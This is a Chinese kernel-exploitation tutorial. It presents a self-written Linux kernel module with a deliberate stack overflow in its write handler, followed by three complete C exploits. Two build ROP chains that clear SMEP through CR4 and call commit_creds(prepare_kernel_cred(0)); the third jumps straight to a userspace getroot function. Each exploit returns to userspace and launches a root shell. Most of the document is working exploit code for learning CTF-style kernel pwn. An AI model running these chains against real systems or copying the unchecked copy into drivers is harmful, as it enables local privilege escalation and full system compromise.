pwnKernel从0开始(二)

前言

先尝试下最简单的栈溢出，保护和未被保护的情况

给出自己设计的栈溢出题目：

#include <linux/module.h>
#include <linux/version.h>
#include <linux/kernel.h>
#include <linux/types.h>
#include <linux/kdev_t.h>
#include <linux/fs.h>
#include <linux/device.h>
#include <linux/cdev.h>
#include <asm/uaccess.h>
#include <linux/slab.h>

//设备驱动常用变量
static char *buffer_var;
static struct class *devClass; // Global variable for the device class
static struct cdev cdev;
static dev_t stack_dev_no;


static ssize_t stack_read(struct file *filp, char __user *buf, size_t count,
        loff_t *f_pos);

static ssize_t stack_write(struct file *filp, const char __user *buf,
size_t len, loff_t *f_pos);

static long stack_ioctl(struct file *filp, unsigned int cmd, unsigned long arg);

// static int stack_open(struct inode *i, struct file *f)
// {
//   printk(KERN_INFO "[i] Module vuln: open()\n");
//   return 0;
// }

// static int stack_close(struct inode *i, struct file *f)
// {
//   printk(KERN_INFO "[i] Module vuln: close()\n");
//   return 0;
// }

static struct file_operations stack_fops =
        {
                .owner = THIS_MODULE,
                // .open = stack_open,
                // .release = stack_close,
                .write = stack_write,
                .read = stack_read
        };

// 设备驱动模块加载函数
static int __init stack_init(void)
{
    buffer_var=kmalloc(100,GFP_DMA);
    printk(KERN_INFO "[i] Module stack registered");
    if (alloc_chrdev_region(&stack_dev_no, 0, 1, "stack") < 0)
    {
        return -1;
    }
    if ((devClass = class_create(THIS_MODULE, "chardrv")) == NULL)
    {
        unregister_chrdev_region(stack_dev_no, 1);
        return -1;
    }
    if (device_create(devClass, NULL, stack_dev_no, NULL, "stack") == NULL)
    {
        printk(KERN_INFO "[i] Module stack error");
        class_destroy(devClass);
        unregister_chrdev_region(stack_dev_no, 1);
        return -1;
    }
    cdev_init(&cdev, &stack_fops);
    if (cdev_add(&cdev, stack_dev_no, 1) == -1)
    {
        device_destroy(devClass, stack_dev_no);
        class_destroy(devClass);
        unregister_chrdev_region(stack_dev_no, 1);
        return -1;
    }

    printk(KERN_INFO "[i] <Major, Minor>: <%d, %d>\n", MAJOR(stack_dev_no), MINOR(stack_dev_no));
    return 0;

}

// 设备驱动模块卸载函数
static void __exit stack_exit(void)
{
    // 释放占用的设备号
    unregister_chrdev_region(stack_dev_no, 1);
    cdev_del(&cdev);
}


// 读设备
ssize_t stack_read(struct file *filp, char __user *buf, size_t count,
        loff_t *f_pos)
{
    printk(KERN_INFO "Stack_read function" );
    if(strlen(buffer_var)>0) {
        printk(KERN_INFO "[i] Module vuln read: %s\n", buffer_var);
        kfree(buffer_var);
        buffer_var=kmalloc(100,GFP_DMA);
        return 0;
    } else {
        return 1;
    }
}

// 写设备
ssize_t stack_write(struct file *filp, const char __user *buf,
size_t len, loff_t *f_pos)
{
    printk(KERN_INFO "Stack_write function" );
    char buffer[100]={0};
    if (_copy_from_user(buffer, buf, len))
        return -EFAULT;
    buffer[len-1]='\0';
    printk("[i] Module stack write: %s\n", buffer);
    strncpy(buffer_var,buffer,len);
    return len;
}



// ioctl函数命令控制
long stack_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
{
    switch (cmd) {
        case 1:
            break;
        case 2:
            break;
        default:
            // 不支持的命令
            return -ENOTTY;
    }
    return 0;
}


module_init(stack_init);
module_exit(stack_exit);

MODULE_LICENSE("GPL");
// MODULE_AUTHOR("blackndoor");
// MODULE_DESCRIPTION("Module vuln overflow");

▲寻找gadget

ropper

ropper --file vmlinux --search "pop|ret"

这个比较慢，实在不推荐

objdump

objdump -d vmlinux -M intel | grep -E 'ret|pop'

这个比较快，不过查出来的gadget可能是不连续的，需要仔细辨别一下，必要时还需要Gdb调试进入vmlinux中进行汇编查询。比如查出来的类似如下

可以看到pop rax下并没有ret，但是依然查找出来了，其中pop rax和pop rbx不是连在一起的，用的时候注意辨别。

ROPgadget

依然可以用，但有时候可能比较慢，可以先保存下来，然后再找：

ROPgadget --binary vmlinux | grep "pop rdx ; ret"

一键获取

详见之前的项目中的getKernelROP命令，常用gadget，还是比较好用的

PIG-007/kernelAll (github.com)

PIG-007/kernelAll (gitee.com)

一、Stack被保护

这里的被保护指的是开启了SMEP，类似于NX的栈保护，即内核无法执行用户空间的代码。

方法一：

通过ROP来关闭掉smep保护，这样就可以进入内核之后启动用户空间我们自己构造的commit_creds(prepare_kernel_cred(0))来完成提权，之后再启一个shell即可获得提权之后的shell。

1.获取地址

由于read函数不太有什么地址的读取，所以这里利用dmesg来获取地址

unsigned long findAddr() {
    char line[512];
    char string[] = "Freeing SMP alternatives memory";
    char found[17];
    unsigned long addr=0;
    
    /* execute dmesg and place result in a file */
	printf("[+] Excecute dmesg...\n");
	system("dmesg > /tmp/dmesg");
	/* find: Freeing SMP alternatives memory*/
	printf("[+] Find usefull addr...\n");

    FILE* file = fopen("/tmp/dmesg", "r");

    while (fgets(line, sizeof(line), file)) {
        if(strstr(line,string)) {
            strncpy(found,line+53,16);
            sscanf(found,"%p",(void **)&addr);
            break;
        }
    }
    fclose(file);

    if(addr==0) {
        printf("    dmesg error...\n");
        exit(1);
    }
    return addr;
}

//main函数中
unsigned long memOffset;
memOffset = findAddr();
unsigned long pop_rax_rbx_r12_rbp_ret = memOffset - 0xCB5B47;
unsigned long movCr4Rax_pop_rbp = (unsigned long)memOffset-0x01020F1C;
unsigned long getR = (unsigned long)getroot;
unsigned long swapgs = (unsigned long)memOffset-0x7AAE78;
unsigned long iretq = (unsigned long)memOffset-0x7AC289;
unsigned long sh = (unsigned long)shell;

dmesg是获取内核启动的日志相关信息，自己去尝试一下知道。

2.关闭SMEP

unsigned char payload[300] = {0};
unsigned char *p           = payload;

/* pop rax;rbx;r12;rbp;ret;*/
unsigned long poprax = (unsigned long)memOffset-0xCB5B47;
memcpy(p,&poprax,8);
printf("    pop rax      at 0x%lx\n", poprax);
p+=8;
memcpy(p,"\xf0\x06\x00\x00\x00\x00\x00\x00",8);   /* SMEP OFF rax*/
p+=8;
memcpy(p,"\x00\x00\x00\x00\x00\x00\x00\x00",8);   /* rbx*/
p+=8;
memcpy(p,"\x00\x00\x00\x00\x00\x00\x00\x00",8);   /* r12 */
p+=8;
memcpy(p,"\x42\x42\x42\x42\x42\x42\x42\x42",8);   /* rbp */
p+=8;

/* mov cr4, rax;rbp;ret     */
unsigned long movcr4 = (unsigned long)memOffset-0x01020F1C;
memcpy(p,&movcr4,8);
printf("    mov CR4, RAX at 0x%lx\n", movcr4);
p+=8;
memcpy(p,"\x42\x42\x42\x42\x42\x42\x42\x42",8);   /* rbp */
p+=8;

3.提权

/* function to get root id */
void getroot (void)
{
  commit_creds(prepare_kernel_cred(0));
}

/* getroot                        */
memcpy(p,&getR,8);
p+=8;

4.返回用户空间起Shell

void shell(void) {
    printf("[+] getuid() ...");
    if(!getuid()) {
        printf(" [root]\n[+] Enjoy your shell...\n");
        system("/bin/sh");
    } else {
        printf("[+] not root\n[+] failed !!!\n");
    }
}

/* swapgs;ret           */
printf("    swapgs       at 0x%lx\n", swapgs);
memcpy(p,&swapgs,8);
p+=8;

/* iretq                          */
printf("    iretq        at 0x%lx\n", iretq);
memcpy(p,&iretq,8);
p+=8;

/* shell                          */
memcpy(p,&sh,8);
p+=8;

5.设置寄存器保存和恢复

进入内核空间ROP链前需要保存环境，从内核环境回到用户空间起shell之前需要恢复环境。

(1)保存环境

unsigned long user_cs;
unsigned long user_ss;
unsigned long user_rflags;

static void save_state() {
  asm(
  "movq %%cs, %0\n"
  "movq %%ss, %1\n"
  "pushfq\n"
  "popq %2\n"
  : "=r" (user_cs), "=r" (user_ss), "=r" (user_rflags) : : "memory"     );
}

这个save_state函数在复制数据通过stack_write函数栈溢出进行ROP之前需要调用保存用户空间的环境。

(2)恢复环境

/* user_cs                        */
memcpy(p,&user_cs,8);
p+=8;

/* user_rflags                    */
memcpy(p,&user_rflags,8);
p+=8;

/*stack of userspace   			  */         
register unsigned long rsp asm("rsp");
unsigned long sp = (unsigned long)rsp;
memcpy(p,&sp,8);
p+=8;

/* user_ss                        */
memcpy(p,&user_ss,8);

这个都是放在ROP链中，放在shell之后。

poc

#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/mman.h>
#include <assert.h>


struct cred;
struct task_struct;
typedef struct cred *(*prepare_kernel_cred_t) (struct task_struct *daemon) __attribute__((regparm(3)));
typedef int (*commit_creds_t) (struct cred *new) __attribute__((regparm(3)));
prepare_kernel_cred_t   prepare_kernel_cred;
commit_creds_t    commit_creds;

unsigned long user_cs;
unsigned long user_ss;
unsigned long user_rflags;
unsigned long stack;


unsigned long findAddr();
static void save_state();
void getroot (void);
void shell(void);


int main(int argc, char *argv[])
{
    int fd;
    unsigned char payload[300] = {0};
    unsigned char *p           = payload;
    unsigned long memOffset;



    memOffset = findAddr();
    unsigned long pop_rax_rbx_r12_rbp_ret = memOffset - 0xCB5B47;
    unsigned long movCr4Rax_pop_rbp = (unsigned long)memOffset-0x01020F1C;
    unsigned long getR = (unsigned long)getroot;
    unsigned long swapgs = (unsigned long)memOffset-0x7AAE78;
    unsigned long iretq = (unsigned long)memOffset-0x7AC289;
    unsigned long sh = (unsigned long)shell;

    printf("    addr[0x%llx]\n", memOffset);

    /* set value for commit_creds and prepare_kernel_cred */
    commit_creds        = (commit_creds_t)(memOffset - 0xfbf6a0);
    prepare_kernel_cred = (prepare_kernel_cred_t)(memOffset - 0xfbf2e0);


    /* open fd on /dev/vuln 							*/
    printf("[+] Open vuln device...\n");
    if ((fd = open("/dev/stack", O_RDWR)) < 0) {
        printf("    Can't open device file: /dev/stack\n");
        exit(1);
    }


    /* payload                          */
    printf("[+] Construct the payload...\n");
    save_state();
    /* offset before RIP                    */
    memcpy(p,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",116);
    p+=116;

    memcpy(p,"\x42\x42\x42\x42\x42\x42\x42\x42",8);   /* for rbp */
    p+=8;

    /* pop rax;rbx;r12;rbp;ret                    */
    memcpy(p,&pop_rax_rbx_r12_rbp_ret,8);
    printf("    pop rax      at 0x%lx\n", pop_rax_rbx_r12_rbp_ret);
    p+=8;
    memcpy(p,"\xf0\x06\x00\x00\x00\x00\x00\x00",8);   /* SMEP OFF */
    p+=8;
    memcpy(p,"\x00\x00\x00\x00\x00\x00\x00\x00",8);   /* rbx*/
    p+=8;
    memcpy(p,"\x00\x00\x00\x00\x00\x00\x00\x00",8);   /* r12 */
    p+=8;
    memcpy(p,"\x42\x42\x42\x42\x42\x42\x42\x42",8);   /* rbp */
    p+=8;

    /* mov cr4, rax;rbp;ret     */
    memcpy(p,&movCr4Rax_pop_rbp,8);
    printf("    mov CR4, RAX at 0x%lx\n", movCr4Rax_pop_rbp);
    p+=8;
    memcpy(p,"\x42\x42\x42\x42\x42\x42\x42\x42",8);   /* rbp */
    p+=8;

    /* getroot                        */
    memcpy(p,&getR,8);
    p+=8;

    /* swapgs;ret           */
    printf("    swapgs       at 0x%lx\n", swapgs);
    memcpy(p,&swapgs,8);
    p+=8;

    /* iretq                          */
    printf("    iretq        at 0x%lx\n", iretq);
    memcpy(p,&iretq,8);
    p+=8;


    /*
	the stack should look like this after an iretq call
	  RIP
	  CS
	  EFLAGS
	  RSP
	  SS
	*/


    /* shell                          */
    memcpy(p,&sh,8);
    p+=8;

    /* user_cs                        */
    memcpy(p,&user_cs,8);
    p+=8;
    /* user_rflags                    */
    memcpy(p,&user_rflags,8);
    p+=8;
    /*stack of userspace   			  */         
    register unsigned long rsp asm("rsp");
    unsigned long sp = (unsigned long)rsp;
    memcpy(p,&sp,8);
    p+=8;
    /* user_ss                        */
    memcpy(p,&user_ss,8);

    /* trig the vuln                  */
    printf("[+] Trig the vulnerablity...\n");
    write(fd, payload, 300);


    return 0;

}





unsigned long findAddr() {
    char line[512];
    char string[] = "Freeing SMP alternatives memory";
    char found[17];
    unsigned long addr=0;

    /* execute dmesg and place result in a file */
    printf("[+] Excecute dmesg...\n");
    system("dmesg > /tmp/dmesg");

    /* find: Freeing SMP alternatives memory    */
    printf("[+] Find usefull addr...\n");

    FILE* file = fopen("/tmp/dmesg", "r");


    while (fgets(line, sizeof(line), file)) {
        if(strstr(line,string)) {
            strncpy(found,line+53,16);
            sscanf(found,"%p",(void **)&addr);
            break;
        }
    }
    fclose(file);

    if(addr==0) {
        printf("    dmesg error...\n");
        exit(1);
    }

    return addr;
}

static void save_state() {
    asm(
        "movq %%cs, %0\n"
        "movq %%ss, %1\n"
        "pushfq\n"
        "popq %2\n"
        : "=r" (user_cs), "=r" (user_ss), "=r" (user_rflags) : : "memory"     );
}


void shell(void) {
    printf("[+] getuid() ...");
    if(!getuid()) {
        printf(" [root]\n[+] Enjoy your shell...\n");
        system("/bin/sh");
    } else {
        printf("[+] not root\n[+] failed !!!\n");
    }
}

/* function to get root id */
void getroot (void)
{
    commit_creds(prepare_kernel_cred(0));
}

方法二：

直接在内核空间利用地址和gadget构造commit_creds(prepare_kernel_cred(0))来完成提权，之后返回用户空间起shell。

1.ROP链

pop rdi;ret
0
prepare_kernel_cred_k
pop rdx;rbx;rbp;ret
pop rbp;ret
0
rbp_data
mov rdi,rax;call rdx
commit_creds_k
swapgs;ret
iretq 

之后就是返回用户空间起shell了

2.解析执行流程

▲先是调用prepare_kernel_cred_k(0)，然后通过将pop rbp;ret赋值给rdx，之后mov rdi,rax，然后call rdx，即调用pop rbp;ret，之后ret即可回到commit_creds_k。

这里较为麻烦的原因是因为mov rdi,rax;call rdx这个语句，需要赋值rdi才能进行commit_creds函数的执行，即将prepare_kernel_cred_k(0)返回值给commit_creds函数。

赋值

之后又因为存在call这个语句，所以多了pop rbp;ret来将栈平衡掉，，从而能够直接ret到commit_creds

同样ha1vk师傅的利用jmp就比较简单，不过具体看gadget，有时候很难找。

poc

#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/mman.h>
#include <assert.h>



unsigned long user_cs;
unsigned long user_ss;
unsigned long user_rflags;
unsigned long stack;


unsigned long findAddr();
static void save_state();
void shell(void);


int main(int argc, char *argv[])
{
    int fd;
    unsigned char payload[300] = {0};
    unsigned char *p           = payload;
    unsigned long memOffset;



    memOffset = findAddr();
    unsigned long pop_rdi_ret = memOffset - 0xD17AF3;
    unsigned long pop_rdx_rbx_rbp_ret = (unsigned long)memOffset-0xCB43CD;
    unsigned long pop_rbp_ret = memOffset - 0xCB43CB;
    unsigned long movRdiRax_call_rdx = (unsigned long)memOffset-0xF8F3AA;
    unsigned long prepare_kernel_cred_k = (unsigned long)memOffset-0xFBF2E0;
    unsigned long commit_creds_k = (unsigned long)memOffset-0xFBF6A0;
    unsigned long swapgs = (unsigned long)memOffset-0x7AAE78;
    unsigned long iretq = (unsigned long)memOffset-0x7AC289;
    unsigned long sh = (unsigned long)shell;




    printf("    addr[0x%llx]\n", memOffset);

    /* open fd on /dev/vuln 							*/
    printf("[+] Open vuln device...\n");
    if ((fd = open("/dev/stack", O_RDWR)) < 0) {
        printf("    Can't open device file: /dev/stack\n");
        exit(1);
    }


    /* payload                          */
    printf("[+] Construct the payload...\n");
    save_state();
    /* offset before RIP                    */
    memcpy(p,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",116);
    p+=116;

    memcpy(p,"\x42\x42\x42\x42\x42\x42\x42\x42",8);   /* for rbp */
    p+=8;


    /*
pop rdi;ret  	ffffffff8131750d
0
prepare_kernel_cred_k_addr   
pop rdx;rbx;rbp;ret  0xffffffff8137ac33
commit_creds_k_addr
mov rdi,rax;call rdx 	0xffffffff8109fc56
swags;	....
pop rbp;ret; 0xffffffff8137ac35
0xdeadbeef
iretq; ....
shell;
CS
EFLAGS
RSP
SS
*/


    /* pop rdi;ret                    */
    printf("    pop rdi      at 0x%lx\n", pop_rdi_ret);
    memcpy(p,&pop_rdi_ret,8);
    p+=8;
    memcpy(p,"\x00\x00\x00\x00\x00\x00\x00\x00",8);   /* rbx*/
    p+=8;

    //prepare_kernel_cred_k
    printf("    prepare_kernel_cred_k_addr at 0x%lx\n", prepare_kernel_cred_k);
    memcpy(p,&prepare_kernel_cred_k,8); 
    p+=8;

    //pop rdx;rbx;rbp;ret
    printf("    pop_rdx_rbx_rbp_ret at 0x%lx\n", pop_rdx_rbx_rbp_ret);
    memcpy(p,&pop_rdx_rbx_rbp_ret,8); 
    p+=8;


    //pop rbp;ret
    printf("    pop_rbp_ret at 0x%lx\n", pop_rbp_ret);
    memcpy(p,&pop_rbp_ret,8);
    p+=8;
    memcpy(p,"\x00\x00\x00\x00\x00\x00\x00\x00",8); //rbx
    p+=8;
    memcpy(p,"\x42\x42\x42\x42\x42\x42\x42\x42",8); //rbp
    p+=8;



    //mov rdi,rax;call rdx
    printf("    mov rdi,rax;call_rdx at 0x%lx\n", movRdiRax_call_rdx);
    memcpy(p,&movRdiRax_call_rdx,8); 
    p+=8;

    //commit_creds_k
    printf("    commit_creds_k at 0x%lx\n", commit_creds_k);
    memcpy(p,&commit_creds_k,8); 
    p+=8;

    /* swapgs;ret           */
    printf("    swapgs       at 0x%lx\n", swapgs);
    memcpy(p,&swapgs,8);
    p+=8;

    /* iretq                          */
    printf("    iretq        at 0x%lx\n", iretq);
    memcpy(p,&iretq,8);
    p+=8;


    /*
	the stack should look like this after an iretq call
	  RIP
	  CS
	  EFLAGS
	  RSP
	  SS
	*/


    /* shell                          */
    memcpy(p,&sh,8);
    p+=8;

    /* user_cs                        */
    memcpy(p,&user_cs,8);
    p+=8;
    /* user_rflags                    */
    memcpy(p,&user_rflags,8);
    p+=8;
    /*stack of userspace   			  */         
    register unsigned long rsp asm("rsp");
    unsigned long sp = (unsigned long)rsp;
    memcpy(p,&sp,8);
    p+=8;
    /* user_ss                        */
    memcpy(p,&user_ss,8);

    /* trig the vuln                  */
    printf("[+] Trig the vulnerablity...\n");
    write(fd, payload, 300);


    return 0;

}





unsigned long findAddr() {
    char line[512];
    char string[] = "Freeing SMP alternatives memory";
    char found[17];
    unsigned long addr=0;

    /* execute dmesg and place result in a file */
    printf("[+] Excecute dmesg...\n");
    system("dmesg > /tmp/dmesg");

    /* find: Freeing SMP alternatives memory    */
    printf("[+] Find usefull addr...\n");

    FILE* file = fopen("/tmp/dmesg", "r");


    while (fgets(line, sizeof(line), file)) {
        if(strstr(line,string)) {
            strncpy(found,line+53,16);
            sscanf(found,"%p",(void **)&addr);
            break;
        }
    }
    fclose(file);

    if(addr==0) {
        printf("    dmesg error...\n");
        exit(1);
    }

    return addr;
}

static void save_state() {
    asm(
        "movq %%cs, %0\n"
        "movq %%ss, %1\n"
        "pushfq\n"
        "popq %2\n"
        : "=r" (user_cs), "=r" (user_ss), "=r" (user_rflags) : : "memory"     );
}

void shell(void) {
    printf("[+] getuid() ...");
    if(!getuid()) {
        printf(" [root]\n[+] Enjoy your shell...\n");
        system("/bin/sh");
    } else {
        printf("[+] not root\n[+] failed !!!\n");
    }
}

(15条消息) linux kernel pwn学习之ROP_seaaseesa的博客-CSDN博客

二、Stack未被保护

解析

这个直接调用用户空间构造的commit_creds(prepare_kernel_cred(0))提权，然后直接原地起shell即可。相当于省去关闭smep保护的那段ROP链，直接getroot即可。

poc

#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/mman.h>
#include <assert.h>


struct cred;
struct task_struct;
typedef struct cred *(*prepare_kernel_cred_t) (struct task_struct *daemon) __attribute__((regparm(3)));
typedef int (*commit_creds_t) (struct cred *new) __attribute__((regparm(3)));
prepare_kernel_cred_t   prepare_kernel_cred;
commit_creds_t    commit_creds;

unsigned long user_cs;
unsigned long user_ss;
unsigned long user_rflags;
unsigned long stack;


unsigned long findAddr();
static void save_state();
void getroot (void);
void shell(void);


int main(int argc, char *argv[])
{
    int fd;
    unsigned char payload[300] = {0};
    unsigned char *p           = payload;
    unsigned long memOffset;



    memOffset = findAddr();
    unsigned long pop_rax_rbx_r12_rbp_ret = memOffset - 0xCB5B47;
    unsigned long movCr4Rax_pop_rbp = (unsigned long)memOffset-0x01020F1C;
    unsigned long getR = (unsigned long)getroot;
    unsigned long swapgs = (unsigned long)memOffset-0x7AAE78;
    unsigned long iretq = (unsigned long)memOffset-0x7AC289;
    unsigned long sh = (unsigned long)shell;




    printf("    addr[0x%llx]\n", memOffset);

    /* set value for commit_creds and prepare_kernel_cred */
    commit_creds        = (commit_creds_t)(memOffset - 0xfbf6a0);
    prepare_kernel_cred = (prepare_kernel_cred_t)(memOffset - 0xfbf2e0);


    /* open fd on /dev/vuln 							*/
    printf("[+] Open vuln device...\n");
    if ((fd = open("/dev/stack", O_RDWR)) < 0) {
        printf("    Can't open device file: /dev/stack\n");
        exit(1);
    }


    /* payload                          */
    printf("[+] Construct the payload...\n");
    save_state();
    /* offset before RIP                    */
    memcpy(p,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",116);
    p+=116;

    memcpy(p,"\x42\x42\x42\x42\x42\x42\x42\x42",8);   /* for rbp */
    p+=8;


    /* getroot                        */
    memcpy(p,&getR,8);
    p+=8;

    /* swapgs;ret           */
    printf("    swapgs       at 0x%lx\n", swapgs);
    memcpy(p,&swapgs,8);
    p+=8;

    /* iretq                          */
    printf("    iretq        at 0x%lx\n", iretq);
    memcpy(p,&iretq,8);
    p+=8;


    /*
	the stack should look like this after an iretq call
	  RIP
	  CS
	  EFLAGS
	  RSP
	  SS
	*/


    /* shell                          */
    memcpy(p,&sh,8);
    p+=8;



    /* user_cs                        */
    memcpy(p,&user_cs,8);
    p+=8;
    /* user_rflags                    */
    memcpy(p,&user_rflags,8);
    p+=8;
    /*stack of userspace   			  */         
    register unsigned long rsp asm("rsp");
    unsigned long sp = (unsigned long)rsp;
    memcpy(p,&sp,8);
    p+=8;
    /* user_ss                        */
    memcpy(p,&user_ss,8);

    /* trig the vuln                  */
    printf("[+] Trig the vulnerablity...\n");
    write(fd, payload, 300);


    return 0;

}





unsigned long findAddr() {
    char line[512];
    char string[] = "Freeing SMP alternatives memory";
    char found[17];
    unsigned long addr=0;

    /* execute dmesg and place result in a file */
    printf("[+] Excecute dmesg...\n");
    system("dmesg > /tmp/dmesg");

    /* find: Freeing SMP alternatives memory    */
    printf("[+] Find usefull addr...\n");

    FILE* file = fopen("/tmp/dmesg", "r");


    while (fgets(line, sizeof(line), file)) {
        if(strstr(line,string)) {
            strncpy(found,line+53,16);
            sscanf(found,"%p",(void **)&addr);
            break;
        }
    }
    fclose(file);

    if(addr==0) {
        printf("    dmesg error...\n");
        exit(1);
    }

    return addr;
}

static void save_state() {
    asm(
        "movq %%cs, %0\n"
        "movq %%ss, %1\n"
        "pushfq\n"
        "popq %2\n"
        : "=r" (user_cs), "=r" (user_ss), "=r" (user_rflags) : : "memory"     );
}

void shell(void) {
    printf("[+] getuid() ...");
    if(!getuid()) {
        printf(" [root]\n[+] Enjoy your shell...\n");
        system("/bin/sh");
    } else {
        printf("[+] not root\n[+] failed !!!\n");
    }
}

/* function to get root id */
void getroot (void)
{
    commit_creds(prepare_kernel_cred(0));
}

▲这里如果加了SMEP保护，那么就会出现下列的错误

unable to execute userspace code (SMEP?) (uid: 1000)